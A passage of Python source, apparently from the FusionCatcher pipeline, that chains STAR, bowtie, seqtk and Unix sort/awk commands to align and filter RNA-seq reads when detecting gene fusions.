job.add('--ff',kind='parameter') job.add('-X',maxlens[i],kind='parameter',from_file="yes") job.add('',gdb,kind='input',temp_path=temp_flag) job.add('-1',outdir('reads-ids_clip_star_psl_unmapped_s_1.fq.')+str(i),kind='input',temp_path=temp_flag) job.add('-2',outdir('reads-ids_clip_star_psl_unmapped_s_2.fq.')+str(i),kind='input',temp_path=temp_flag) if bowtie121: job.add('',outdir('split_gene-gene_star_unmapped.sam.')+str(i),kind='output') job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star-unampped.stdout.txt.')+str(i),kind='output',checksum='no',temp_path=temp_flag) else: job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star-unampped.stdout.txt.')+str(i),kind='output',checksum='no',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',"""'$3 == "*" { next } { print }'""",kind='parameter') job.add('>',outdir('split_gene-gene_star_unmapped.sam.')+str(i),kind='output') job.run() else: job.clean(gdb,temp_path=temp_flag) # job.add('du',kind='program') # job.add('-b',gda,kind='input') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('cut',kind='parameter') # job.add('-f','1',kind='parameter') # job.add('>',outdir('gene-gene2__nuc.txt.')+str(i),kind='output',dest_list='gg2nuc') # job.run() # get the length of the FASTA file job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-v','"^>"',kind='parameter') job.add('',gda,kind='input') job.add('|',kind='parameter') job.add('wc',kind='parameter') job.add('|',kind='parameter') job.add('awk',kind='parameter') job.add("'{print $3-$1}'",kind='parameter') job.add('>',outdir('gene-gene2__nuc.txt.')+str(i),kind='output',dest_list='gg2nuc') job.run() nucleotides2_gg = int(float(file(outdir('gene-gene2__nuc.txt.')+str(i),'r').readline().strip())) job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-c',kind='parameter') job.add("'^>'",gda,kind='input') job.add('>',outdir('gene-gene2__seq.txt.')+str(i),kind='output',dest_list='gg2seq') job.run(successful_exit_status=(0,1)) sequences2_gg = int(float(file(outdir('gene-gene2__seq.txt.')+str(i),'r').readline().strip())) genomesaindexnbases2 = int(min(14, math.log(nucleotides2_gg,2)/(float(2)) - 1)) genomechrbinnbits2 = int(min(18, math.log(float(nucleotides2_gg)/float(sequences2_gg),2))) # build the STAR index job.add(_SR_+'STAR',kind='program') job.add('--genomeChrBinNbits',genomechrbinnbits2,kind='parameter') job.add('--genomeSAindexNbases',genomesaindexnbases2,kind='parameter') job.add('--runMode','genomeGenerate',kind='parameter') job.add('--runThreadN',options.processes,kind='parameter',checksum='no') if star25: job.add('--genomeSuffixLengthMax','10000',kind='parameter') # for STAR 2.5.x job.add('--genomeDir',outdir('gene-gene-bowtie_star2.'+str(i)+'/'),kind='output') job.add('--genomeFastaFiles',gda,kind='input',temp_path=temp_flag) job.add('--outFileNamePrefix',outdir('gene-gene-bowtie_star2_results.'+str(i)+'/'),kind='output',temp_path=temp_flag) job.run() # align the unmapped reads using STAR on candidate fusion gene-gene job.add(_SR_+'STAR',kind='program') job.add('--runRNGseed','54321',kind='parameter') #job.add('--twopass1readsN','-1',kind='parameter') #job.add('--twopassMode','Basic',kind='parameter') job.add('--genomeSAindexNbases',genomesaindexnbases2,kind='parameter') job.add('--alignIntronMax',outdir('gene-gene_longest.txt'),kind='parameter',from_file = 'yes') job.add('--outFilterMatchNmin',length_anchor_star-1,kind='parameter')# 17 job.add('--outSAMattributes','NM',kind='parameter') # 'NM' ==> NM is different than nM job.add('--outFilterMatchNminOverLread','0.80',kind='parameter') job.add('--outFilterScoreMinOverLread','0.80',kind='parameter') # NEW in v0.99.4b job.add('--alignSplicedMateMapLminOverLmate','0.80',kind='parameter') # NEW in v0.99.4b job.add('--genomeDir',outdir('gene-gene-bowtie_star2.'+str(i)+'/'),kind='input',temp_path=temp_flag) job.add('--runThreadN',options.processes,kind='parameter',checksum='no') job.add('--seedSearchStartLmax',length_anchor_star-1,kind='parameter')# default is: 50 if star25: job.add('--alignSJstitchMismatchNmax','5 -1 5 5',kind='parameter')# default is: 0 -1 0 0 # added in STAR 2.5.x job.add('--limitOutSAMoneReadBytes','100000000',kind='parameter') job.add('--alignTranscriptsPerReadNmax','500000',kind='parameter') # if this is missing STAR crashes in some cases job.add('--scoreGap','-10000',kind='parameter') job.add('--alignEndsType','EndToEnd',kind='parameter') # disable soft clipping job.add('--readFilesIn',outdir('reads-ids_clip_star_psl_unmapped_s_1.fq.')+str(i),kind='input',temp_path=temp_flag) job.add('',outdir('reads-ids_clip_star_psl_unmapped_s_2.fq.')+str(i),kind='input',temp_path=temp_flag) job.add('--outFileNamePrefix',outdir('gene-gene-star-results-unmapped.'+str(i)+'/'),kind='output') job.run() job.link(outdir('gene-gene-star-results-unmapped.'+str(i),'Aligned.out.sam'),outdir('split_gene-gene_star_unmapped.sam.')+str(i),temp_path=temp_flag) job.add(_FC_+'merge-sam.py',kind='program') job.add('--input',outdir('split_gene-gene_star_unmapped.sam.')+str(i),kind='input',temp_path=temp_flag) job.add('--output',outdir('split_gene-gene_star_unmapped_patch.sam.')+str(i),kind='output') #job.add('--mismatches-long',options.mismatches+1,kind='parameter') job.add('--mismatches-long',options.mismatches_gap,kind='parameter') job.add('--mismatches-short',options.mismatches,kind='parameter') if not options.skip_ig_star: job.add('--forward-reverse',kind='parameter') job.run() job.clean(outdir('gene-gene-star-results-unmapped.'+str(i)+'/'),temp_path=temp_flag) job.add(_FC_+'sam2psl.py',kind='program') if not options.skip_ig_star: job.add('--replace-read-ids','=',kind='parameter') job.add('--input',outdir('split_gene-gene_star_unmapped_patch.sam.')+str(i),kind='input',temp_path=temp_flag) #job.add('--output',outdir('split_gene-gene_star_unmapped_patch.psl.')+str(i),kind='output') job.add('--output','-',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-k','10,10',kind='parameter') job.add('-k','14,14',kind='parameter') job.add('-k','12,12n',kind='parameter') job.add('-k','13,13n',kind='parameter') job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('split_gene-gene_star_unmapped_patch.psl.')+str(i),kind='output') job.run() job.add(_FC_+'analyze_splits_sam.py',kind='program') job.add('--input',outdir('split_gene-gene_star_unmapped_patch.psl.')+str(i),kind='input',temp_path=temp_flag) job.add('--output',outdir('split_gene-gene_star_unmapped_final.psl.')+str(i),kind='output',dest_list='splitstarunmapped') job.add('--remove-extra',kind='parameter') job.run() # if job.iff(empty(outdir('split_gene-gene_star_final.psl.')+str(i)),id = "#split_gene-gene_star_final."+str(i)+"#"): job.link(outdir('gene-gene-star.psl.')+str(i), outdir('gene-gene-star_more.psl.')+str(i), temp_path=temp_flag, dest_list='genegenestar') job.clean(outdir('split_gene-gene_star_final.psl.')+str(i),temp_path=temp_flag) else: job.add('cat',kind='program') job.add('',outdir('split_gene-gene_star_final.psl.')+str(i),kind='input',temp_path=temp_flag) job.add('',outdir('gene-gene-star.psl.')+str(i),kind='input',temp_path=temp_flag) job.add('>',outdir('gene-gene-star_more.psl.')+str(i),kind='output',dest_list='genegenestar') job.run() #job.clean(outdir('gene-gene_split_star.fa'),temp_path=temp_flag) job.clean(outdir('reads_gene-gene_no-str_fixed.fq'),temp_path=temp_flag) job.clean(outdir('reads_gene-gene_no-str.fq'),temp_path=temp_flag if options.skip_bowtie2 else 'no') job.sink(job.genegenestar, outdir('gene-gene-star_more.psl.txt')) job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('gene-gene-star_more.psl.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('gene-gene-star_more.psl'),kind='output') job.run() job.clean(job.genegenestar,temp_path=temp_flag) if hasattr(job,'splitstarunmapped'): job.sink(job.splitstarunmapped, outdir('split_gene-gene_star_unmapped_final.psl.txt')) job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('split_gene-gene_star_unmapped_final.psl.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('split_gene-gene_star_unmapped_final.psl'),kind='output') job.run() job.clean(job.splitstarunmapped,temp_path=temp_flag) else: # build the STAR index job.add(_SR_+'STAR',kind='program') job.add('--genomeChrBinNbits',genomechrbinnbits,kind='parameter') job.add('--genomeSAindexNbases',genomesaindexnbases,kind='parameter') job.add('--runMode','genomeGenerate',kind='parameter') job.add('--runThreadN',options.processes,kind='parameter',checksum='no') if star25: job.add('--genomeSuffixLengthMax','10000',kind='parameter') # for STAR 2.5.x job.add('--genomeDir',outdir('gene-gene-star/'),kind='output') job.add('--genomeFastaFiles',outdir('gene-gene.fa'),kind='input') job.add('--outFileNamePrefix',outdir('gene-gene-star-results/'),kind='output') job.run() # align the unmapped reads using STAR on candidate fusion gene-gene # t = "[from file: '%s']" % (outdir('gene-gene_longest.txt'),) # #if job.run(): # if os.path.exists(outdir('gene-gene_longest.txt')): # t = file(outdir('gene-gene_longest.txt'),'r').readline().strip() job.add(_SR_+'STAR',kind='program') job.add('--runRNGseed','54321',kind='parameter') #job.add('--twopass1readsN',outdir('log_counts_reads_gene-gene_no-str.txt'),kind='parameter',from_file='yes') job.add('--twopass1readsN','-1',kind='parameter') job.add('--twopassMode','Basic',kind='parameter') job.add('--genomeSAindexNbases',genomesaindexnbases,kind='parameter') job.add('--sjdbOverhang',outdir('star_sdjboverhang.txt'),kind='parameter',from_file='yes') job.add('--alignIntronMax',outdir('gene-gene_longest.txt'),kind='parameter',from_file = 'yes') if options.skip_star_bowtie: job.add('--outFilterMatchNmin',int(float(min_len_reads)*0.90),kind='parameter') job.add('--outFilterMatchNminOverLread','0.90',kind='parameter') job.add('--outFilterScoreMinOverLread','0.90',kind='parameter') # NEW in v0.99.4b job.add('--alignSplicedMateMapLminOverLmate','0.90',kind='parameter') # NEW in v0.99.4b else: perc = 0.40 if eporcrlf2igh: perc = float("%.4f" % ((float(length_anchor_minimum - 1) / float(min_len_reads)),)) job.add('--outFilterMatchNmin',int(float(min_len_reads)*perc),kind='parameter') job.add('--outFilterMatchNminOverLread',perc,kind='parameter') job.add('--outFilterScoreMinOverLread',perc,kind='parameter') # NEW in v0.99.4b job.add('--alignSplicedMateMapLminOverLmate',perc,kind='parameter') # NEW in v0.99.4b job.add('--genomeDir',outdir('gene-gene-star/'),kind='input',temp_path=temp_flag) job.add('--runThreadN',options.processes,kind='parameter',checksum='no') job.add('--seedSearchStartLmax',length_anchor_star-1,kind='parameter')# default is: 50 job.add('--alignSJoverhangMin',length_anchor_star-1,kind='parameter') #9 # default is 5? # NEW in v0.99.4b if star25: job.add('--alignSJstitchMismatchNmax','5 -1 5 5',kind='parameter')# default is: 0 -1 0 0 # added in STAR 2.5.0a job.add('--outSJfilterOverhangMin','10 10 10 10',kind='parameter')# default is: 30 12 12 12 ("non-canonical motifs","GT/AG"motif,"GC/AG"motif,"AT/AC"motif) job.add('--outSJfilterCountUniqueMin','1 1 1 1',kind='parameter')# default is: 3 1 1 1 job.add('--outSJfilterCountTotalMin','1 1 1 1',kind='parameter')# default is: 3 1 1 1 job.add('--outSJfilterDistToOtherSJmin','0 0 0 0',kind='parameter')# default is: 10 0 5 10 #job.add('--outSJfilterIntronMaxVsReadN','%s %s %s' % (t,t,t),kind='parameter')# default is: 50000 100000 200000 job.add('--outSJfilterIntronMaxVsReadN',outdir('gene-gene_longest.txt'),kind='parameter',from_file='yes')# default is: 50000 100000 200000 job.add('',outdir('gene-gene_longest.txt'),kind='parameter',from_file='yes')# default is: 50000 100000 200000 job.add('',outdir('gene-gene_longest.txt'),kind='parameter',from_file='yes')# default is: 50000 100000 200000 job.add('--limitOutSAMoneReadBytes','100000000',kind='parameter') job.add('--scoreGapNoncan','-4',kind='parameter') job.add('--scoreGapATAC','-4',kind='parameter') # job.add('--outFilterMultimapScoreRange','10',kind='parameter') # job.add('--outFilterMultimapNmax','10000',kind='parameter') # job.add('--chimScoreJunctionNonGTAG','0',kind='parameter') # job.add('--chimScoreDropMax','10000',kind='parameter')# default is: 0 # job.add('--chimScoreMin','0',kind='parameter')# default is: 0 # job.add('--chimScoreSeparation','10',kind='parameter')# default is: 0 # job.add('--chimSegmentMin',outdir('gene-gene_longest.txt'),kind='parameter',from_file = 'yes') # job.add('--chimJunctionOverhangMin',outdir('gene-gene_longest.txt'),kind='parameter',from_file = 'yes') if is_optparse_provided(parser,'limitSjdbInsertNsj'): job.add('--limitSjdbInsertNsj',options.limitSjdbInsertNsj,kind='parameter') if is_optparse_provided(parser,'limitOutSJcollapsed'): job.add('--limitOutSJcollapsed',options.limitOutSJcollapsed,kind='parameter') job.add('--readFilesIn',outdir('reads_gene-gene_no-str_fixed.fq'),kind='input',temp_path=temp_flag) job.add('--outFileNamePrefix',outdir('gene-gene-star-results/'),kind='output') job.run() # this works! # # STAR \ # --alignIntronMax [ARGUMENT from file '/apps/fusioncatcher/output/snu16/gene-gene_longest.txt'] \ # --outFilterMatchNmin 30 \ # --outFilterMatchNminOverLread 0.90 \ # --genomeDir /apps/fusioncatcher/output/snu16/gene-gene-star/ \ # --runThreadN 4 \ # --seedSearchStartLmax 20 \ # --alignSJoverhangMin 9 \ # --outSJfilterOverhangMin 10 10 10 10 \ # --outSJfilterCountUniqueMin 1 1 1 1 \ # --outSJfilterCountTotalMin 1 1 1 1 \ # --outSJfilterDistToOtherSJmin 0 0 0 0 \ # --outSJfilterIntronMaxVsReadN [from file: '/apps/fusioncatcher/output/snu16/gene-gene_longest.txt'] [from file: '/apps/fusioncatcher/output/snu16/gene-gene_longest.txt'] [from file: '/apps/fusioncatcher/output/snu16/gene-gene_longest.txt'] \ # --readFilesIn /apps/fusioncatcher/output/snu16/reads_gene-gene_no-str_fixed.fq \ # --outFileNamePrefix /apps/fusioncatcher/output/snu16/gene-gene-star-results/ job.add('LC_ALL=C',kind='program') job.add('sed',kind='parameter') job.add("""'s/\-\([1-2]\\t\)/\/\\1/'""",outdir('gene-gene-star-results','Aligned.out.sam'),kind='input') job.add("",outdir('gene-gene-star-results/'),kind='input',temp_path=temp_flag,command_line='no') job.add('|',kind='parameter') job.add(_FC_+'sam2psl.py',kind='parameter') job.add('--input','-',kind='parameter') #job.add('--output',outdir('gene-gene-star.psl'),kind='output') #job.run() job.add('--output','-',kind='output') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-k','10,10',kind='parameter') job.add('-k','14,14',kind='parameter') job.add('-k','12,12n',kind='parameter') job.add('-k','13,13n',kind='parameter') job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('gene-gene-star.psl'),kind='output') job.run() if options.skip_star_bowtie: job.link(outdir('gene-gene-star.psl'), outdir('gene-gene-star_more.psl'), temp_path=temp_flag) job.clean(outdir('reads_gene-gene_no-str.fq'),temp_path=temp_flag if options.skip_bowtie2 else 'no') else: job.add(_FC_+'analyze_splits_sam.py',kind='program') job.add('--input',outdir('gene-gene-star.psl'),kind='input') job.add('--output',outdir('gene-gene-star_final.psl'),kind='output',temp_path=temp_flag) job.add('--clipped-reads-ids',outdir('reads-ids_clip_psl_star.txt'),kind='output') job.add('--clipped-reads-refs',outdir('reads-refs_clip_psl_star.txt'),kind='output') job.add('--clip-min',length_anchor_star,kind='parameter') job.run() # job.add('sed',kind='program') # job.add("""'s/\-\([1-2]\\t\)/\/\\1/'""",outdir('gene-gene-star-results','Chimeric.out.sam'),kind='input') # job.add("",outdir('gene-gene-star-results/'),kind='input',temp_path=temp_flag,command_line='no') # job.add('|',kind='parameter') # job.add('sam2psl.py',kind='parameter') # job.add('--input','-',kind='parameter') # job.add('--output',outdir('gene-gene-star-chimeric.psl'),kind='output') # job.run() # # job.add('analyze_star_chimeric.py',kind='program') # job.add('--input',outdir('gene-gene-star-chimeric.psl'),kind='input',temp_path=temp_flag) # job.add('--output',outdir('gene-gene-star-chimeric_final.psl'),kind='output') # job.run() # # # group reads which map on transcriptome in one FASTQ file # job.add('concatenate.py',kind='program') # job.add('',outdir('gene-gene-star.psl'),kind='input',temp_path=temp_flag) # job.add('',outdir('gene-gene-star-chimeric_final.psl'),kind='input',temp_path=temp_flag) # job.add('',outdir('gene-gene-star_all.psl'),kind='output') # job.run() if job.iff(empty(outdir('reads-ids_clip_psl_star.txt')),id = "#reads-ids-clip-psl-star#"): job.clean(outdir('reads-ids_clip_psl_star.txt'),temp_path=temp_flag) job.clean(outdir('reads-refs_clip_psl_star.txt'),temp_path=temp_flag) job.clean(outdir('reads_gene-gene_no-str.fq'),temp_path=temp_flag if options.skip_bowtie2 else 'no') else: job.add('LC_ALL=C',kind='program') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('reads-ids_clip_psl_star.txt'),kind='input',temp_path=temp_flag) # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads-ids_clip_star_psl_uniq.txt'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cut',kind='parameter') job.add('-f1',outdir('reads-ids_clip_star_psl_uniq.txt'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('subseq',kind='parameter') job.add('',outdir('reads_gene-gene_no-str.fq'),kind='input',temp_path=temp_flag if options.skip_bowtie2 else 'no') #job.add('',outdir('original_important.fq.gz'),kind='input') job.add('-',kind='parameter') job.add('>',outdir('reads-ids_clip_star_psl.fq'),kind='output') job.run() job.add(_FC_+'split-reads.py',kind='program') job.add('--input',outdir('reads-ids_clip_star_psl.fq'),kind='input') job.add('--list',outdir('reads-ids_clip_star_psl_uniq.txt'),kind='input') job.add('--output-1',outdir('reads-ids_clip_star_psl_r1.fq'),kind='output') job.add('--output-2',outdir('reads-ids_clip_star_psl_r2.fq'),kind='output') job.add('--wiggle-size',options.rescue_wiggle_size,kind='parameter') job.add('--gap-size',options.rescue_gap_size,kind='parameter') job.add('--anchor-size',length_anchor_minimum,kind='parameter') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.run(error_message = ("If this fails due to a memory error then lowering the "+ "buffer size (to 50% or 25%) using the command line option --extra-buffer-size "+ "of FusionCatcher and running it again might help!")) job.add('LC_ALL=C',kind='program') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('reads-refs_clip_psl_star.txt'),kind='input',temp_path=temp_flag) # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads-refs_clip_star_psl_uniq.txt'),kind='output') job.run() # some pre-filtering of splitting reads (filter out the split reads which map on one gene) job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads-refs_clip_star_psl_uniq.txt'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('"|"',kind='parameter') job.add('"\\t"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('cut',kind='parameter') job.add('-f',"1,2",kind='parameter') job.add('|',kind='parameter') job.add('tr',kind='parameter') job.add('"\\t"',kind='parameter') job.add('"\\n"',kind='parameter') job.add('|',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') # unique job.add('|',kind='parameter') job.add('sed',kind='parameter') job.add("'1{/^$/d}'",kind='parameter') # delete first line if it empty (that contains only newline) job.add('>',outdir('reads-refs_clip_star_psl_uniq_more.txt'),kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('gene-gene_unique.fa'),kind='input') job.add('',outdir('reads-refs_clip_star_psl_uniq_more.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('gene-gene-bowtie_star_unique.fa'),kind='output') job.run() job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') #job.add('',outdir('gene-gene.fa'),kind='input') job.add('',outdir('gene-gene-bowtie_star_unique.fa'),kind='input',temp_path=temp_flag) job.add('',outdir('gene-gene-bowtie_star_unique/'),kind='output',checksum='no') job.add('',outdir('gene-gene-bowtie_star_unique/'),kind='output',command_line='no') job.run() # map using bowtie # filter out reads not mapping ms = min(options.mismatches,2) if options.skip_fastqtk: job.add(_SK_+'seqtk',kind='program') job.add('mergepe',kind='parameter') job.add('',outdir('reads-ids_clip_star_psl_r1.fq'),kind='input') job.add('',outdir('reads-ids_clip_star_psl_r2.fq'),kind='input') else: job.add(_FK_+'fastqtk',kind='program') job.add('interleave',kind='parameter') job.add('',outdir('reads-ids_clip_star_psl_r1.fq'),kind='input') job.add('',outdir('reads-ids_clip_star_psl_r2.fq'),kind='input') job.add('-',kind='parameter') job.add('|',kind='parameter') job.add(_FC_+'sliding-read.py',kind='parameter') job.add('--window','33',kind='parameter') job.add('--step','15',kind='parameter') job.add('-i','-',kind='parameter') job.add('-o','-',kind='parameter') job.add('|',kind='parameter') job.add(_BE_+'bowtie',kind='parameter') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k','1',kind='parameter') # job.add('--trim5','10',kind='parameter') # job.add('--trim3','10',kind='parameter') job.add('-v',ms,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('--tryhard',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--suppress','2,3,4,5,6,7,8',kind='parameter') if os.path.isfile(os.path.join(outdir('gene-gene-bowtie_star_unique'),'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',outdir('gene-gene-bowtie_star_unique/'),kind='input') job.add('-',kind='parameter') job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star-temp.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') if eporcrlf2igh == False: job.add('awk',kind='parameter') job.add('',"""'{n=length($0); if (olde=="a" && substr($0,0,n-1)==old && substr($0,n,1)=="b") {print old"a\\n"$0; old="";} {old=substr($0,0,n-1); olde=substr($0,n,1);}}'""",kind='parameter') else: job.add('awk',kind='parameter') job.add("""'{n=length($0); r=substr($0,1,n-1); print r"a"; print r"b"}'""",kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('reads_filtered_unique_cuts_star.txt'),kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads-ids_clip_star_psl_r1.fq'),kind='input') job.add('',outdir('reads_filtered_unique_cuts_star.txt'),kind='input') job.add('>',outdir('reads-ids_clip_star_psl_r1r1.fq'),kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads-ids_clip_star_psl_r2.fq'),kind='input') job.add('',outdir('reads_filtered_unique_cuts_star.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads-ids_clip_star_psl_r2r2.fq'),kind='output') job.run() # this is for the case when the out from the previous command is empty (then it takes the first read) if job.iff(empty(outdir('reads-ids_clip_star_psl_r1r1.fq')),id = "##reads-ids_clip_star_psl_r1r1.fq##"): job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_star_psl_r1.fq'),kind='input') job.add('>',outdir('reads-ids_clip_star_psl_r1r1-t.fq'),kind='output') job.run() job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_star_psl_r2.fq'),kind='input') job.add('>',outdir('reads-ids_clip_star_psl_r2r2-t.fq'),kind='output') job.run() job.clean(outdir('reads-ids_clip_star_psl_r1r1.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_r2r2.fq'),temp_path=temp_flag) else: job.link(outdir('reads-ids_clip_star_psl_r1r1.fq'), outdir('reads-ids_clip_star_psl_r1r1-t.fq'), temp_path=temp_flag) job.link(outdir('reads-ids_clip_star_psl_r2r2.fq'), outdir('reads-ids_clip_star_psl_r2r2-t.fq'), temp_path=temp_flag) # map using bowtie ms = min(options.mismatches,2) job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k','1',kind='parameter') job.add('-v',ms,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-X',outdir('gene-gene_longest.txt'),kind='parameter',from_file="yes") job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--ff',kind='parameter') job.add('--un',outdir('reads-ids_clip_star_psl_unmapped_filtered.fq'),kind='output',checksum='no') # unmapped reads job.add('--un',outdir('reads-ids_clip_star_psl_unmapped_filtered_1.fq'),kind='output',command_line='no') # unmapped reads job.add('--un',outdir('reads-ids_clip_star_psl_unmapped_filtered_2.fq'),kind='output',command_line='no') # unmapped reads job.add('--max',outdir('reads-ids_clip_star_psl_max_filtered.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(os.path.join(outdir('gene-gene-bowtie_star_unique'),'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',outdir('gene-gene-bowtie_star_unique/'),kind='input',temp_path=temp_flag) job.add('-1',outdir('reads-ids_clip_star_psl_r1r1-t.fq'),kind='input',temp_path=temp_flag) job.add('-2',outdir('reads-ids_clip_star_psl_r2r2-t.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('split_gene-gene_star_filtered.sam'),kind='output',temp_path=temp_flag) job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.run() # this is for the case when the out from the previous command is empty (then it takes the first read) if job.iff(empty(outdir('reads-ids_clip_star_psl_unmapped_filtered_1.fq')),id = "##reads-ids_clip_star_psl_unmapped_filtered_1.fq##"): job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_star_psl_r1.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads-ids_clip_star_psl_unmapped_filtered_1_t.fq'),kind='output') job.run() job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_star_psl_r2.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads-ids_clip_star_psl_unmapped_filtered_2_t.fq'),kind='output') job.run() job.clean(outdir('reads-ids_clip_star_psl_unmapped_filtered_1.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_unmapped_filtered_2.fq'),temp_path=temp_flag) else: job.link(outdir('reads-ids_clip_star_psl_unmapped_filtered_1.fq'), outdir('reads-ids_clip_star_psl_unmapped_filtered_1_t.fq'), temp_path=temp_flag) 